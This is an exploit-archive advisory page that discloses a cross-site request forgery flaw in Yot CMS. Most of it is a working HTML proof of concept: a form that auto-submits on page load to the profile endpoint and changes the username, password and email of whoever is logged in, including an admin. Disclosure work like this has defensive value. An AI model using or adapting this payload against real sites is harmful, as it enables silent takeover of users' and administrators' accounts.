YOT CMS Cross-Site Request Forgery - user profile changing

2019.02.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Product : Yot CMS webapp # Author : ÃŕMąŃđÒ - NullByteStream Team # vendor homepage : https://sourceforge.net/projects/yot/ # Date : 10/2/2019 # Dork : N/A ############################################################## This CSRF vulnerability allows attacker to change user/admin account details ( username , password .... ) Exploit : <html> <body onload='document.forms[0].submit()'> <form action="http://site.com/index.php?page=user&op=do_profil" method="POST" name="user_form" enctype="multipart/form-data" OnSubmit='return user_form_verifchamps();'> <table name="user_form" class="tabform" cellpadding="1" align="center" ><tr><td valign="top"><label>Pseudo</label> :</td><td valign="top"><input type="text" name="user" value="newusername" size="30" /> * </td></tr><tr><td valign="top"><label>Pr�nom</label> :</td><td valign="top"><input type="text" name="firstname" value="armando" size="30" /></td></tr><tr><td valign="top"><label>Nom</label> :</td><td valign="top"><input type="text" name="name" value="syria" size="30" /></td></tr><tr><td valign="top"><label>Mot de passe</label> :</td><td valign="top"><input type="password" name="pass1" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Retaper mot de passe</label> :</td><td valign="top"><input type="password" name="pass2" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Email</label> :</td><td valign="top"><input type="text" name="mail" value="MyEmail@server.com" size="30" /> * </td></tr><tr><td valign="top"><label>URL Avatar</label> :</td><td valign="top"><input type="text" name="avatar" value="" size="30" /></td></tr><tr><td valign="top"><label>T�l�charger un avatar</label> :</td><td valign="top"><input type="file" name="upload_avatar" /></td></tr><tr><td valign="top"><label>Th�me</label> :</td><td valign="top"><select name="theme"><option value="" selected></option><option value="coolbad" >coolbad</option><option value="coolbad_jaune" >coolbad_jaune</option><option value="yot3" >yot3</option></select></td></tr><tr><td valign="top"><label>Pr�venir par email d'une nouvelle news</label> :</td><td valign="top"><input type="radio" name="mailnews" value="1" />Oui&nbsp;&nbsp;<input type="radio" name="mailnews" value="0" checked />Non&nbsp;&nbsp;</td></tr></table> <div align="center">(*) Champs obligatoires<br/><br/><input type="submit" value="Modifier"/></div> </form> ############################################################### NBS Team http;//nullbytestream.tk ###############################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top